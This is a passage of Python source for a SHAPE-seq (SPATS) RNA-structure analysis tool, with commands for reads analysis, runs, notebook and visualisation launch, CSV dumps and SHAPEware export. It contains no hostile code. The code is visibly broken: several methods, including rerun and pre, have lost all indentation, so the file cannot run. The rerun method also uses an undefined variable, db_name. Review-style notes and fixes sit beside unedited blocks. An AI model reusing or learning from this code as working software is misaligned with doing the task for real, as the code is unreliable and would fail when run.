open(config_path, 'wt').write(_spats_config_template)
self._add_note("Created default spats.config, please edit before running tools.")
else:
self._add_note("** spats.config already exists, not overwriting!")
    def reads(self):
        """Perform reads analysis on the r1/r2 fragment pairs, for use with the visualization tool.

        Builds <path>/reads.spats: the native 'reads' tool parses the pairs when
        available, otherwise the python ReadsData parser is used; either way a
        ReadsAnalyzer then tags the parsed pairs in place.
        """
        db_name = self._reads_file()
        if os.path.exists(db_name):
            self._add_note("** removing previous reads file")
            os.remove(db_name)
        native_tool = self._native_tool('reads')
        if native_tool:
            self._add_note("using native reads")
            subprocess.check_call([native_tool, self.config['target'], self.r1, self.r2, db_name], cwd = self.path)
        data = ReadsData(db_name)
        if not native_tool:
            self._add_note("using python reads")
            if self.using_separate_channel_files:
                # NOTE(review): len()/indexing here require plus_channels to be a
                # sequence, not a lazy zip object -- verify on Python 3.
                pcs = self.plus_channels
                if len(pcs) > 1:
                    raise Exception("multiple positive r1 channel files not supported for reads tool.")
                data.parse(self.config['target'], [pcs[0][0], self.r1_minus], [pcs[0][1], self.r2_minus])
            else:
                data.parse(self.config['target'], [self.r1], [self.r2])
        analyzer = ReadsAnalyzer(data, cotrans = self.cotrans)
        self._update_run_config(analyzer.run)
        # xref https://trello.com/c/VMFyZjjg/286-handle-quality-parsing-in-reads-tool-if-configured
        # to do this, we'd need to parse quality to the db (nontrivial)
        # for now just force-disable this, as it's not required to do reads analysis
        analyzer.run.mutations_require_quality_score = None
        analyzer.process_tags()
        self._add_note("tags processed to {}".format(os.path.basename(db_name)))
def rerun(self):
""" Re-does reads analysis for pairs that have a tag into a new result set to allow comparing results across config options.
"""
if not self._command_args or len(self._command_args) != 4:
raise Exception("usage: spats_tool rerun tag spats_run result_set_name cmp_set_name\n\t- tag indicating the pairs to rerun\n\t- path to a spats database file\n\t- name for the new result set\n\t- name of result set to compare against.")
tag = self._command_args[0]
spatsdb = self._command_args[1]
result_set_name = self._command_args[2]
cmp_set_name = self._command_args[3]
if not os.path.exists(spatsdb):
raise Exception("spats_run file does not exist at path {}".format(spatsdb))
native_tool = self._native_tool('reads')
if native_tool:
self._add_note("using native reads")
subprocess.check_call([native_tool, self.config['target'], self.r1, self.r2, db_name], cwd = self.path)
data = ReadsData(spatsdb)
if data.pair_db.result_set_id_for_name(result_set_name):
raise Exception("result_set_name '{}' already exists in spats db".format(result_set_name))
cmp_set_id = data.pair_db.result_set_id_for_name(cmp_set_name)
if not cmp_set_id:
raise Exception("cmp_set_name '{}' does not exist in spats db".format(cmp_set_name))
if not native_tool:
self._add_note("using python reads")
if self.using_separate_channel_files:
raise Exception('rerun tool not supported with separate channel files')
analyzer = ReadsAnalyzer(data, cotrans = self.cotrans)
data.pair_db.load_run(analyzer.run)
self._update_run_config(analyzer.run)
analyzer.run._redo_tag = tag
analyzer.run.result_set_name = result_set_name
analyzer.run.cmp_set_id = cmp_set_id
# xref https://trello.com/c/VMFyZjjg/286-handle-quality-parsing-in-reads-tool-if-configured
# to do this, we'd need to parse quality to the db (nontrivial)
# for now just force-disable this, as it's not required to do reads analysis
analyzer.run.mutations_require_quality_score = None
redo_tags = data.pair_db.tag_counts(cmp_set_id, [ tag ])
self._add_note("rerunning {} pairs (incl. multiples) with tag '{}'...".format(redo_tags[tag], tag))
analyzer.process_tags()
self._add_note("tags processed to {}".format(os.path.basename(spatsdb)))
num_done = data.pair_db.num_results(result_set_name)
diff_failures = 0
new_failures = 0
fixed_failures = 0
diff_sites = 0
diff_ends = 0
for res in data.pair_db.differing_results(result_set_name, cmp_set_name):
assert(res[13] == res[14])
multiplicity = min(int(res[13]), int(res[14]))
if res[7] != res[12]:
diff_failures += multiplicity
if res[7] and not res[12]:
new_failures += multiplicity
elif res[12] and not res[7]:
fixed_failures += multiplicity
else:
if res[5] != res[10]:
diff_sites += multiplicity
if res[4] != res[9]:
diff_ends += multiplicity
print("New result set '{}' for tagged pairs added to {}.".format(result_set_name, spatsdb))
print("Quick comparison of {} unique tagged pairs with result_set '{}' yielded: ".format(num_done, cmp_set_name))
print("\t- {} pairs with different failures".format(diff_failures))
print("\t - {} failures were fixed".format(fixed_failures))
print("\t - {} failures were new".format(new_failures))
print("\t- {} pairs with different sites".format(diff_sites))
print("\t- {} pairs with different ends".format(diff_ends))
def pre(self):
"""Process the pre-sequence data file.
"""
if 'preseq' not in self.config:
raise Exception("Missing 'preseq' file in spats.config")
pre_files = [ f.strip() for f in self.config['preseq'].split(',') ]
for filename in pre_files:
key, _ = os.path.splitext(os.path.basename(filename))
pre_name = self._pre_file(key)
if os.path.exists(pre_name):
self._add_note("** removing previous preseq file")
os.remove(pre_name)
preseq_data = abif_parse(filename, fields = [ 'DATA2', 'DATA3', 'DATA105' ])
open(pre_name, 'wt').write(json.dumps(preseq_data))
self._add_note("pre-sequencing data processed to {}".format(os.path.basename(pre_name)))
nb = self._notebook()
if nb:
nb.add_preseq(key).save()
def _run_plots(self):
nb = self._notebook()
if nb:
nb.add_spats_run(self.cotrans, True).save()
    def run(self):
        """Process the SPATS data for the configured target(s) and r1/r2 fragment pairs.

        Writes <path>/run.spats. Uses the native cotrans processor only for
        cotrans runs with no custom config overrides; otherwise the python
        Spats pipeline runs, with special handling for separate plus/minus
        channel files (minus processed first, then each plus set).
        """
        run_name = self._run_file()
        if os.path.exists(run_name):
            self._add_note("** removing previous run file")
            os.remove(run_name)
        native_tool = self._native_tool('cotrans')
        if native_tool and not self.cotrans:
            self._add_note("skipping native tool due to non-cotrans run")
            native_tool = None
        spats = Spats(cotrans = self.cotrans)
        # any config key applied to the run disqualifies the native tool,
        # which only implements the default configuration
        if self._update_run_config(spats.run) and native_tool:
            self._add_note("skipping native tool due to custom config")
            native_tool = None
        if native_tool:
            self._add_note("using native cotrans processor")
            subprocess.check_call([native_tool, self.config['target'], self.r1, self.r2, run_name], cwd = self.path)
        else:
            self._add_note("using python processor")
            spats.addTargets(self.config['target'])
            if self.using_separate_channel_files:
                self._add_note("using separate channel files.")
                self._add_note("processing minus/untreated pairs")
                # placeholder masks are used when the run defines none
                spats.process_pair_data(self.r1_minus, self.r2_minus, force_mask = (spats.run.masks[1] if spats.run.masks[1] else MINUS_PLACEHOLDER))
                # NOTE(review): len()/indexing here require plus_channels to be
                # a sequence, not a lazy zip object -- verify on Python 3.
                pcs = self.plus_channels
                if len(pcs) == 1:
                    self._add_note("processing plus/treated pairs")
                    spats.process_pair_data(pcs[0][0], pcs[0][1], force_mask = (spats.run.masks[0] if spats.run.masks[0] else PLUS_PLACEHOLDER))
                    spats.store(run_name)
                else:
                    if len(spats.run.masks) >= 2 and (not spats.run.masks[0] or not spats.run.masks[1]):
                        raise Exception("empty masks with split channels not supported for reads tool.")
                    # base store holds the minus data; each plus set gets its
                    # own .pN output with counters reset in between
                    spats.store(run_name)
                    for i, (r1_plus, r2_plus) in enumerate(pcs):
                        self._add_note("processing plus/treated pairs, set #{}".format(i + 1))
                        spats._processor.counters.reset()
                        spats.process_pair_data(r1_plus, r2_plus, force_mask = (spats.run.masks[0] if spats.run.masks[0] else PLUS_PLACEHOLDER))
                        spats.store(run_name + ".p{}".format(i + 1))
            else:
                spats.process_pair_data(self.r1, self.r2)
                spats.store(run_name)
        self._add_note("wrote output to {}".format(os.path.basename(run_name)))
        nb = self._notebook()
        if nb:
            nb.add_spats_run(self.cotrans, spats.run.count_mutations).save()
def _update_run_config(self, run, dictionary = None):
    """Apply non-reserved keys from self.config onto `run`.

    Each config value is parsed with ast.literal_eval when possible (so
    "True", "4", "[1, 2]" become real Python values) and kept as the raw
    string otherwise.  Keys that `run` does not already expose as
    attributes are reported as warnings and skipped.

    :param run: run-settings object, updated in place
    :param dictionary: optional dict that also receives every applied
        key/value pair (fix: an empty dict passed here is now populated;
        previously a truthiness check skipped it)
    :return: True if at least one custom setting was applied
    """
    custom_config = False
    # Unique marker lets getattr() distinguish "attribute missing" from
    # any legitimate value (including None) on `run`.
    sentinel = '_-=*< sEnTiNeL >*-=_'
    for key, value in self.config.items():
        # These keys configure the tool itself, not the spats run.
        if key in [ "r1", "r2", "r1_plus", "r2_plus", "r1_minus", "r2_minus", "preseq", "target", "cotrans" ]:
            continue
        if sentinel != getattr(run, key, sentinel):
            try:
                val = ast.literal_eval(value)
            except (ValueError, TypeError, SyntaxError):
                # Not a Python literal -- treat it as a plain string.
                val = value
            setattr(run, key, val)
            self._add_note("config set {} = {}".format(key, val))
            if dictionary is not None:
                dictionary[key] = val
            custom_config = True
        else:
            self._add_note("warning: unknown config {}".format(key))
    return custom_config
def _spats_file(self, base_name):
    """Return the path to '<base_name>.spats' inside this tool's directory."""
    filename = '{}.spats'.format(base_name)
    return os.path.join(self.path, filename)
def _pre_file(self, key):
    # Path of the pre-sequencing data file for `key` ('pre_<key>.spats').
    return self._spats_file('pre_{}'.format(key))
def _run_file(self):
    # Path of the primary spats run output file ('run.spats').
    return self._spats_file('run')
def _reads_file(self):
    # Path of the reads-analysis database file ('reads.spats').
    return self._spats_file('reads')
def _notebook(self):
    """Return a Notebook for this run directory, or None when the optional
    notebook dependencies (jupyter / nbformat) are unavailable.

    A freshly-created (empty) notebook is seeded with the run metadata
    and the standard initializer cell.
    """
    try:
        import spats_shape_seq.nbutil as nbutil
    except ImportError:
        # Notebook support is optional; callers treat None as "unavailable".
        # (Was a bare except, which also hid unrelated failures.)
        return None
    nb = nbutil.Notebook(os.path.join(self.path, 'spats.ipynb'))
    if nb.is_empty():
        nb.add_metadata(self.metadata)
        nb.add_initializer()
    return nb
def validate(self):
    """Validate the results of a previous 'process' run against a second (slower) algorithm.
    """
    run_name = self._run_file()
    if not os.path.exists(run_name):
        raise Exception("Run must be performed before validating")
    spats = Spats()
    spats.load(run_name)
    passed = spats.validate_results(self.r1, self.r2)
    self._add_note("Validation pass" if passed else "Validation FAILURE")
def _install_nbextensions(self):
ext_out = subprocess.check_output(["jupyter", "nbextension", "list", "--user"])
if "spats_shape_seq/main" not in ext_out:
subprocess.check_call(["jupyter", "nbextension", "install", "--user", "--py", "spats_shape_seq"])
subprocess.check_call(["jupyter", "nbextension", "enable", "--user", "--py", "spats_shape_seq"])
def _install_jupyter_browser_fix(self):
    """Ensure the user's Jupyter notebook config opens the browser via
    'open %s', appending the setting unless one is already present.

    Fix: file handles are now closed deterministically via `with`
    (previously open().read() / open().write() leaked handles).
    """
    jup_conf_path = os.path.expanduser('~/.jupyter/jupyter_notebook_config.py')
    jup_conf_line = "c.NotebookApp.browser = u'open %s'\n"
    if os.path.exists(jup_conf_path):
        with open(jup_conf_path, 'rt') as conf_file:
            jup_conf = conf_file.read()
        if 'c.NotebookApp.browser' in jup_conf:
            # Respect an existing (possibly customized) browser setting.
            return
        jup_conf += "\n" + jup_conf_line
    else:
        jup_conf = jup_conf_line
    with open(jup_conf_path, 'wt') as conf_file:
        conf_file.write(jup_conf)
def _install_matplotlib_styles(self):
    """Copy the bundled matplotlib style files into the user's matplotlib
    'stylelib' config folder, creating folders as needed; style files
    that already exist are left untouched.
    """
    import matplotlib as mpl
    conf_dir = mpl.get_configdir()
    if not os.path.exists(conf_dir):
        os.mkdir(conf_dir)
    style_dir = os.path.join(conf_dir, 'stylelib')
    if not os.path.exists(style_dir):
        os.mkdir(style_dir)
    static_path = os.path.join(self._module_path(), 'static', 'styles')
    for style in os.listdir(static_path):
        destination = os.path.join(style_dir, style)
        if os.path.exists(destination):
            continue
        shutil.copyfile(os.path.join(static_path, style), destination)
def nb(self):
    """Launch the Jupyter notebook.

    Installs the notebook extensions, matplotlib styles, and browser
    configuration first, then runs 'jupyter notebook' in the run
    directory until it exits; Ctrl-C terminates it cleanly.
    """
    self._skip_log = True
    if not self._notebook():
        # typo fixed: "pacakges" -> "packages"
        raise Exception('Notebook requires the jupyter and nbformat packages. Try "pip install nbformat jupyter".')
    self._install_nbextensions()
    self._install_matplotlib_styles()
    self._install_jupyter_browser_fix()
    try:
        process = subprocess.Popen(["jupyter", "notebook", "-y", "spats.ipynb"], cwd = self.path)
        process.wait()
    except KeyboardInterrupt:
        # Give the notebook server a moment to shut down gracefully.
        process.terminate()
        time.sleep(0.4)
        process.wait()
def viz(self):
    """Launch the visualization tool UI.
    """
    self._skip_log = True
    # The UIClient app bundle is macOS-only.
    if sys.platform != "darwin":
        raise Exception("Invalid platform for viz UI: {}".format(sys.platform))
    # Build/prepare the viz components before launching.
    subprocess.check_call(["make", "vizprep"], cwd = self._spats_path())
    def viz_handler():
        # Runs the viz server; exits when the UI client disconnects.
        from viz.ui import SpatsViz
        sv = SpatsViz()
        sv.stop_on_disconnect = True
        sv.start()
        sv.waitFor()
    def uiclient_handler():
        # Runs the native macOS UI client app.
        bin_path = os.path.join(self._spats_path(), "bin", "UIClient.app", "Contents", "MacOS", "UIClient")
        try:
            subprocess.call([bin_path], cwd = self._spats_path())
        except KeyboardInterrupt:
            pass
    # Start the server first, the client shortly after, and keep the
    # tool alive while both are running.
    viz_worker = multiprocessing.Process(target = viz_handler, args = [])
    viz_worker.start()
    uiclient_worker = multiprocessing.Process(target = uiclient_handler, args = [])
    time.sleep(0.1)
    uiclient_worker.start()
    try:
        while viz_worker.is_alive() and uiclient_worker.is_alive():
            viz_worker.join(0.1)
            uiclient_worker.join(0.1)
    except KeyboardInterrupt:
        pass
    # If the client died first, let the server finish on its own; if the
    # server died first, force the client to quit.
    if viz_worker.is_alive():
        viz_worker.join()
    if uiclient_worker.is_alive():
        uiclient_worker.terminate()
def dump(self):
    """Dump data. Provide 'reads', 'run', 'prefixes', 'mut_counts' or 'indel_lens'
    as an argument to dump the indicated type of data.
    """
    self._skip_log = True
    if not self._command_args:
        raise Exception("Dump requires a type ('reads', 'run', 'prefixes', 'mut_counts' or 'indel_lens').")
    dump_type = self._command_args[0]
    handler = getattr(self, "_dump_" + dump_type, None)
    if handler is None:
        raise Exception("Invalid dump type: {}".format(dump_type))
    # 'reads' has its own data source and signature; everything else is
    # driven through the run-file wrapper.
    if dump_type == 'reads':
        self._dump_reads()
    else:
        self._dump_wrapper(handler)
def _dump_reads(self):
    """Dump per-tag read counts from the reads database to 'reads.csv',
    sorted by descending count, with each tag's percentage of all pairs.
    """
    reads_name = self._reads_file()
    if not os.path.exists(reads_name):
        raise Exception("Reads must be run before attempting dump")
    db = ReadsData(reads_name).pair_db
    counts = db.tag_counts(1)
    total = float(db.count()) / 100.0  # because of this, cannot dump "rerun" data
    ordered = sorted(counts.keys(), key = lambda tag : counts[tag], reverse = True)
    rows = [ [ tag, float(counts[tag]) / total, counts[tag] ] for tag in ordered ]
    self._write_csv(os.path.join(self.path, 'reads.csv'), [ "Tag", "Percentage", "Count" ], rows)
def _dump_wrapper(self, handler):
    """Invoke `handler` on loaded run data.

    If partial-run files ('<run>.pN') exist in the run directory, each is
    merged into a fresh copy of the base run and dumped with a 'pN_'
    filename prefix; otherwise the base run alone is dumped.

    Fixes: the match pattern is a raw string with the base filename
    escaped (the old literal '.'/non-raw escapes matched too loosely),
    and partial files are merged by full path instead of a bare name
    that only resolved when the cwd happened to be self.path.

    :param handler: callable(spats, fprefix="") that writes the dump
    :raises Exception: if the run file does not exist yet
    """
    run_name = self._run_file()
    if not os.path.exists(run_name):
        raise Exception("Run must be run before attempting dump")
    partial = False
    base_file = ntpath.basename(run_name)
    pattern = r"^{}\.p(\d+)$".format(re.escape(base_file))
    for filep in os.listdir(self.path):
        rn = re.match(pattern, filep)
        if not rn:
            continue
        spats = Spats()
        spats.load(run_name)
        spats.merge(os.path.join(self.path, filep))
        handler(spats, "p{}_".format(rn.group(1)))
        partial = True
    if not partial:
        spats = Spats()
        spats.load(run_name)
        handler(spats)
def _dump_prefixes(self, spats, fprefix = ""):
    """Dump per-mask prefix counts to CSV.

    Writes two files per mask: '<fprefix>prefixes_<mask>.csv' with every
    pair (percentages of total_pairs) and
    '<fprefix>mapped_prefixes_<mask>.csv' (percentages of
    registered_pairs).  The previously duplicated loop bodies are
    factored into one local helper.
    """
    countinfo = spats.counters.counts_dict()
    def write_prefix_counts(counter_key_fmt, total_key, file_fmt):
        # One CSV per mask: (prefix, percentage, count) rows, descending by count.
        total = float(countinfo[total_key]) / 100.0
        for mask in spats.run.masks:
            keyprefix = counter_key_fmt.format(mask)
            prefixes = []
            for key in sorted([k for k in countinfo.keys() if k.startswith(keyprefix)], key = lambda k : countinfo[k], reverse = True):
                prefixes.append((key[len(keyprefix):], float(countinfo[key]) / total, countinfo[key]))
            output_path = os.path.join(self.path, file_fmt.format(fprefix, mask))
            self._write_csv(output_path, [ "Tag", "Percentage", "Count" ], prefixes)
    write_prefix_counts("prefix_{}_", 'total_pairs', '{}prefixes_{}.csv')
    write_prefix_counts("mapped_prefix_{}_", 'registered_pairs', '{}mapped_prefixes_{}.csv')
def _dump_mut_counts(self, spats, prefix = ""):
    """Dump mutation-count histograms to CSV: one file for all reads
    ('mut_count_*' counters) and one for mapped reads
    ('mapped_mut_count_*' counters).  The previously duplicated loop
    bodies are factored into one local helper.
    """
    countinfo = spats.counters.counts_dict()
    def write_counts(counter_prefix, filename):
        # Rows of (mutation count, reads), ascending by mutation count.
        rows = []
        for muts in sorted([int(k.split('_')[-1]) for k in countinfo.keys() if k.startswith(counter_prefix)]):
            rows.append((muts, countinfo[counter_prefix + str(muts)]))
        self._write_csv(os.path.join(self.path, filename), [ "Mutation Count", "Reads" ], rows)
    write_counts('mut_count_', '{}mut_counts.csv'.format(prefix))
    write_counts('mapped_mut_count_', '{}mapped_mut_counts.csv'.format(prefix))
def _dump_indel_lens(self, spats, prefix = ""):
    """Dump the mapped indel length histogram to CSV, ascending by length."""
    countinfo = spats.counters.counts_dict()
    keyprefix = 'mapped_indel_len_'
    lengths = sorted(int(k.split('_')[-1]) for k in countinfo.keys() if k.startswith(keyprefix))
    rows = [ (lc, countinfo[keyprefix + str(lc)]) for lc in lengths ]
    output_path = os.path.join(self.path, '{}mapped_indel_len_counts.csv'.format(prefix))
    self._write_csv(output_path, [ "Indel Length", "Reads" ], rows)
def _dump_run(self, spats, prefix = ""):
    """Dump the computed reactivity profiles to CSV.

    Writes one '<prefix><target>.csv' per target with per-site rows (the
    column set depends on the run's count_mutations / handle_indels /
    compute_z_reactivity settings); for cotrans runs, also writes one
    '<prefix><target>_<key>_mat.csv' matrix per profile attribute.
    Finally warns about interior sites with zero reads in both channels.

    :param spats: a loaded Spats instance
    :param prefix: filename prefix (e.g. 'p1_' for partial-run dumps)
    """
    profiles = spats.compute_profiles()
    mutations = spats.run.count_mutations
    indels = spats.run.handle_indels
    zees = spats.run.compute_z_reactivity
    # Column layout mirrors the datapt construction below.
    headers = [ "L", "site", "nt", "f+", "f-" ]
    if indels:
        headers += [ "ins+", "ins-", "del+", "del-" ]
    if mutations:
        headers += [ "mut+", "mut-", "beta", "mu", "r" ]
    else:
        headers += [ "beta", "theta", "rho" ]
    if zees:
        headers += [ "z" ]
    headers += [ "c thresh", "c" ]
    data = []
    sites_missing_reads = []  # (target, end, site) triples with zero reads in both channels
    if self.cotrans:
        # Cotrans runs have exactly one target; one row per (end, site).
        tgt = spats.targets.targets[0]
        tseq = tgt.seq
        for key in profiles.cotrans_keys():
            end = int(key.split('_')[-1])
            prof = profiles.profilesForTargetAndEnd(tgt.name, end)
            for i in range(end + 1):
                if 0 == prof.treated[i] and 0 == prof.untreated[i]:
                    sites_missing_reads.append( (tgt, end, i) )
                # Site 0 has no nucleotide; rendered as '*'.
                datapt = [ end, i, tseq[i - 1] if i else '*', prof.treated[i], prof.untreated[i] ]
                if indels:
                    datapt += [ prof.treated_inserts[i], prof.untreated_inserts[i], prof.treated_deletes[i], prof.untreated_deletes[i] ]
                if mutations:
                    datapt += [ prof.treated_muts[i], prof.untreated_muts[i], prof.beta[i], prof.mu[i], prof.r_mut[i] ]
                else:
                    datapt += [ prof.beta[i], prof.theta[i], prof.rho[i] ]
                if zees:
                    datapt += [ prof.z[i] ]
                datapt += [ prof.c_thresh, prof.c ]
                data.append(datapt)
        output_path = os.path.join(self.path, '{}{}.csv'.format(prefix, tgt.name))
        self._write_csv(output_path, headers, data)
        # Also emit one matrix CSV per profile attribute: one row per end,
        # short rows padded with empty cells to a fixed width.
        empty_cell = ''
        keys = [ 'treated', 'untreated' ]
        if indels:
            keys += [ 'treated_inserts', 'untreated_inserts', 'treated_deletes', 'untreated_deletes' ]
        if mutations:
            # NOTE(review): attribute names here ('treated_mut') differ from
            # the per-site columns above ('treated_muts') -- confirm both
            # attributes exist on the profile objects.
            keys += [ 'treated_mut', 'untreated_mut', 'beta', 'mu', 'r' ]
        else:
            keys += [ 'beta', 'theta', 'rho' ]
        if zees:
            keys += [ 'z' ]
        cotrans_keys = profiles.cotrans_keys()
        for key in keys:
            ncols = 0
            mat = []
            for pkey in cotrans_keys:
                end = int(pkey.split('_')[-1])
                prof = profiles.profilesForTargetAndEnd(tgt.name, end)
                vals = getattr(prof, key)
                if not ncols:
                    # Fixed width derived from the first (shortest) profile.
                    ncols = len(cotrans_keys) + len(vals)
                if len(vals) < ncols:
                    vals += ([empty_cell] * (ncols - len(vals)))
                mat.append(vals)
            # NOTE(review): written relative to the cwd, not self.path --
            # confirm this is intended.
            self._write_csv('{}{}_{}_mat.csv'.format(prefix, tgt.name, key), None, mat)
    else:
        # Single-length runs: one CSV per target, 'end' is the target length.
        for tgt in spats.targets.targets:
            tseq = tgt.seq
            end = len(tgt.seq)
            prof = profiles.profilesForTarget(tgt)
            data = []
            for i in range(end + 1):
                if 0 == prof.treated[i] and 0 == prof.untreated[i]:
                    sites_missing_reads.append( (tgt, end, i) )
                datapt = [ end, i, tseq[i - 1] if i else '*', prof.treated[i], prof.untreated[i] ]
                if indels:
                    datapt += [ prof.treated_inserts[i], prof.untreated_inserts[i], prof.treated_deletes[i], prof.untreated_deletes[i] ]
                if mutations:
                    datapt += [ prof.treated_muts[i], prof.untreated_muts[i], prof.beta[i], prof.mu[i], prof.r_mut[i] ]
                else:
                    datapt += [ prof.beta[i], prof.theta[i], prof.rho[i] ]
                if zees:
                    datapt += [ prof.z[i] ]
                datapt += [ prof.c_thresh, prof.c ]
                data.append(datapt)
            output_path = os.path.join(self.path, '{}{}.csv'.format(prefix, tgt.name))
            self._write_csv(output_path, headers, data)
    missing_targets = list(set([ s[0] for s in sites_missing_reads ]))
    for tgt in missing_targets:
        # only warn for sites "far from" the end (for now defined by 2 * minimum required match length)
        min_len = spats.run.minimum_target_match_length
        tgt_missing_sites = [ s for s in sites_missing_reads if s[0] == tgt and s[1] - s[2] > 2 * min_len ]
        num_missing = len(tgt_missing_sites)
        if 0 == num_missing:
            # we might have pruned them due to length
            continue
        if self.cotrans:
            tgt_missing_sites = [ "{}/{}".format(s[1], s[2]) for s in tgt_missing_sites ]
        else:
            tgt_missing_sites = [ str(s[2]) for s in tgt_missing_sites ]
        if len(tgt_missing_sites) > 20:
            # Truncate the report to keep the warning readable.
            tgt_missing_sites = tgt_missing_sites[:20]
            tgt_missing_sites.append("...")
        print(" ** Warning: target {} has 0 reads from both channels at {} sites: {} ".format(tgt.name, num_missing, ", ".join(tgt_missing_sites)))
def _write_csv(self, output_path, headers, data, delimiter=','):
    """Write `headers` (when provided) and `data` rows to `output_path`
    as delimited text, and record the file name in the run notes.
    """
    with open(output_path, 'wt') as out_file:
        writer = csv.writer(out_file, delimiter = delimiter)
        if headers:
            writer.writerow(headers)
        writer.writerows(data)
    self._add_note("Data dumped to {}".format(os.path.basename(output_path)))
def _dump_old_txt(self, spats, prefix = ""):
    """Dump reactivities in the legacy tab-delimited text format used by
    older lab software: one '*_reactivities.txt' per cotrans end (plus
    per-attribute '*_table.txt' matrices), or one '<target>.txt' per
    target for single-length runs.
    """
    profiles = spats.compute_profiles()
    mutations = spats.run.count_mutations
    headers = [ "sequence", "rt_start", "five_prime_offset", "nucleotide", "treated_mods", "untreated_mods", "beta", "theta", "c" ]
    if mutations:
        # Mutation runs report 'r' instead of 'theta'.
        headers[6] = "r"
    if not spats.run.allow_negative_values:
        headers[8] = "c_thresh"
    data = []
    if self.cotrans:
        # Drop the last two linker nucleotides (legacy-format convention).
        linker = spats.run.cotrans_linker[:-2]
        tgt = spats.targets.targets[0]
        tseq = tgt.seq
        for key in profiles.cotrans_keys():
            end = int(key.split('_')[-1])
            rt_start = end + len(linker) + 1
            prof = profiles.profilesForTargetAndEnd(tgt.name, end)
            # xref https://trello.com/c/enfGViaw/398-cotrans-output-backwards-compatibility-for-other-lab-software
            # always report `profiles.c_thresh` here, note that it's only different
            # from `prof.c` when `not spats.run.allow_negative_values` -- in which
            # case (see above) we update the column header name
            cval = prof.c_thresh
            seq = "{}_{}nt".format(tgt.name, end)
            data = []
            for i in range(end + 1):
                datapt = [ seq, rt_start, i, tseq[i - 1] if i else '*', prof.treated[i], prof.untreated[i] ]
                if not i:
                    # Site 0 carries no reactivity values.
                    datapt += [ '-', '-', cval ]
                elif mutations:
                    datapt += [ prof.r_mut[i], (prof.r_mut[i] / cval) if cval else prof.r_mut[i], cval ]
                else:
                    datapt += [ prof.beta[i], prof.theta[i], cval ]
                data.append(datapt)
            # Append zero rows for the (truncated) linker positions.
            for i in range(len(linker)):
                data.append([ seq, rt_start, end + i + 1, linker[i], 0, 0, 0, 0, cval ])
            # NOTE(review): the format string has three placeholders but four
            # arguments -- the trailing tgt.name is silently ignored by .format().
            output_path = os.path.join(self.path, '{}{}_{}_reactivities.txt'.format(prefix, seq, rt_start, tgt.name))
            self._write_csv(output_path, headers, data, delimiter = '\t')
        keys = [ 'treated', 'untreated' ]
        if mutations:
            keys += [ 'beta', 'mu', 'r' ]
        else:
            keys += [ 'beta', 'theta', 'rho' ]
        cotrans_keys = profiles.cotrans_keys()
        for key in keys:
            ncols = 0
            mat = []
            for pkey in cotrans_keys:
                end = int(pkey.split('_')[-1])
                prof = profiles.profilesForTargetAndEnd(tgt.name, end)
                vals = getattr(prof, key)
                if not ncols:
                    # NOTE(review): ncols is computed but, unlike _dump_run,
                    # never used to pad short rows here -- confirm intended.
                    ncols = len(cotrans_keys) + len(vals)
                mat.append(vals)
            # Legacy naming for the raw read-count tables.
            name = { 'treated' : 'treated_mods_reads','untreated' : 'untreated_mods_reads' }.get(key, key)
            # NOTE(review): written relative to the cwd, not self.path -- confirm intended.
            self._write_csv('{}{}_table.txt'.format(prefix, name), None, mat, delimiter = '\t')
    else:
        for tgt in spats.targets.targets:
            tseq = tgt.seq
            end = len(tgt.seq)
            prof = profiles.profilesForTarget(tgt)
            data = []
            rt_start = end - 1
            for i in range(end):
                datapt = [ tgt.name, rt_start, i, tseq[i - 1] if i else '*', prof.treated[i], prof.untreated[i] ]
                if not i:
                    datapt += [ '-', '-', prof.c ]
                elif mutations:
                    datapt += [ prof.beta[i], prof.mu[i], prof.r_mut[i] ]
                else:
                    datapt += [prof.beta[i], prof.theta[i], prof.c ]
                data.append(datapt)
            output_path = os.path.join(self.path, '{}{}.txt'.format(prefix, tgt.name))
            self._write_csv(output_path, headers, data, delimiter = '\t')
def plot(self):
    """Plot data, provide an argument for the plot type. For
    single-length, provide 'counts', 'rho', 'beta', 'theta',
    'muts', or 'muts_reactivity'. For cotrans, provide 'counts',
    'c', 'treated', 'untreated', 'treated_muts', 'untreated_muts',
    'rho', 'beta', 'theta', 'r_mut', 'mu_mut', 'beta_mut',
    'treated_mut', 'untreated_mut'.
    """
    self._skip_log = True
    if not self._command_args:
        raise Exception("Plot requires a type.")
    plot_type = self._command_args[0]
    import plots
    handler_name = "plot_" + ("cotrans_" if self.cotrans else "sl_") + plot_type
    handler = getattr(plots, handler_name, None)
    if handler is None:
        raise Exception("Invalid plot type: {}".format(plot_type))
    handler().show()
def handle_filter(self):
    """Generates an output of the demultiplexed positive and negative
    fastq files for R1 and R2.
    """
    self._skip_log = True
    counters = Counters()
    files = fastq_handle_filter(self.r1, self.r2, counters=counters)
    total_included = counters.RRRY + counters.YYYR
    self._add_note("{} pairs filtered to:\n {}".format(total_included, "\n ".join(files)))
    self._add_note("{} RRRY pairs included.".format(counters.RRRY))
    self._add_note("{} YYYR pairs included.".format(counters.YYYR))
    self._add_note("{} pairs without matching handle were not included.".format(counters.no_mask))
def _pp_channel_files(self, channel_files):
    """Gzip each demultiplexed channel file and return the sample names.

    Fix: gzip is invoked with an argument list (no shell) so file names
    containing spaces, quotes, or shell metacharacters cannot break the
    command or inject shell syntax.

    :param channel_files: paths to the per-channel fastq files
    :return: (treated, untreated) sample-name prefixes, defaulting to
        the mask names when no matching file is present
    """
    treated = "RRRY"
    untreated = "YYYR"
    for cfp in channel_files:
        cf = os.path.basename(cfp)
        subprocess.check_call(['gzip', cfp], cwd = os.path.dirname(cfp))
        if cf.startswith('RRRY'):
            treated = cf.split('_')[0]
        elif cf.startswith('YYYR'):
            untreated = cf.split('_')[0]
    return treated, untreated
def to_shapeware(self):
    """Create a folder from a spats dataset suitable for running
    with the SHAPEware tool produced by Arrakis.
    """
    self._skip_log = True
    if not self._command_args:
        raise Exception("to_shapeware requires a path be specified for the ouptut folder.")
    output_folder = self._command_args[0]
    if os.path.exists(output_folder):
        raise Exception("to_shapeware output folder already exists at {}".format(output_folder))
    data_dir = os.path.join(output_folder, "raw_data")
    os.makedirs(data_dir)
    # Demultiplex the input pairs into per-channel fastq files (masks
    # stripped) directly inside SHAPEware's raw_data directory, then gzip
    # them and recover the sample-name prefixes.
    counters = Counters()
    channel_files = fastq_handle_filter(self.r1, self.r2, strip_mask=True, outpath=data_dir, counters=counters)
    treated, untreated = self._pp_channel_files(channel_files)
    ## Note: the denatured sample is used as a "baseline" in SHAPEware,
    ## for example: reactivity = (mutr_treated - mutr_untreated) / mutr_denatured
    ## Since we don't have denatured, we'll use the untreated sample as the baseline.
    denatured = untreated
